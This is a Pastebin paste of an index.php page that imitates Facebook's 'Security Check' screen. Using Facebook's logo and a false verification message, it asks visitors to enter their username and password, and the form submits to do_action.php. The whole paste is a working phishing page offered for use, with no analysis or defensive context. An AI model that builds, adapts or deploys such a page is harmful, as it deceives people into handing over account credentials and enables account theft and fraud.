Advertisement
FlyFar

index.php

Jun 18th, 2023
988
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.42 KB | Cybersecurity | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4.     <meta charset="UTF-8">
  5.     <title>Security Check</title>
  6.     <link rel="shortcut icon" type="ico" href="images/fb-ico.png">
  7.     <link rel="stylesheet" type="text/css" href="style.css">
  8. </head>
  9. <body>
  10.     <header>
  11.         <div class="main-header">
  12.             <div class="logo">
  13.                 <a href="http://www.facebook.com"><img src="images/logo.png" alt="Facebook"></a>
  14.             </div>
  15.         </div>
  16.     </header>
  17.     <section>
  18.         <div class="form">
  19.             <div class="m-header">
  20.                 <h3>Facebook Security Check</h3>
  21.             </div>
  22.             <div class="red-box">
  23.                 <p style="font-weight:bold; font-size:13px">Verification needed to understand it's you</p>
  24.                 <p>Enter your password for security reasons (make sure you have caps lock turned off)</p>
  25.                 <p>Forgot your password? <a href="http://www.facebook.com">Reset your password</a>
  26.             </div>
  27.  
  28.             <div class="login-form">
  29.                 <form action="do_action.php">
  30.                     <label for="username">Username:</label>
  31.                     <input name="username" type="text" id="username"></input><br /><br />
  32.                     <label for="password">Password:</label>
  33.                     <input name="password" id="password" type="password"></input><br />
  34.                     <input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
  35.                     <label for="keep" style="font-size:12px;">keep me logged in</label><br />
  36.                     <input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
  37.                     <p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="">can't log in?</a></p>
  38.                 </form>
  39.             </div>
  40.  
  41.         </div>
  42.        
  43.         <footer>
  44.             <ul>
  45.                 <li><a href="/">Mobile</a></li>
  46.                 <li><a href="/">Find Friends</a></li>
  47.                 <li><a href="/">Badges</a></li>
  48.                 <li><a href="/">People</a></li>
  49.                 <li><a href="/">Pages</a></li>
  50.                 <li><a href="/">Apps</a></li>
  51.                 <li><a href="/">Games</a></li>
  52.                 <li><a href="/">Music</a></li>
  53.                 <li><a href="/">Locations</a></li>
  54.             </ul>
  55.             <ul>
  56.                 <li><a href="/">Topics</a></li>
  57.                 <li><a href="/">About</a></li>
  58.                 <li><a href="/">Create Ad</a></li>
  59.                 <li><a href="/">Create Page</a></li>
  60.                 <li><a href="/">Devepers</a></li>
  61.                 <li><a href="/">Careers</a></li>
  62.                 <li><a href="/">Privacy</a></li>
  63.                 <li><a href="/">Cookies</a></li>
  64.                 <li><a href="/">Terms</a></li><br />
  65.                 <li><a href="/">Help</a></li>
  66.             </ul>
  67.         </footer>
  68.     </section>
  69. </body>
  70. </html>
Tags: php index
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement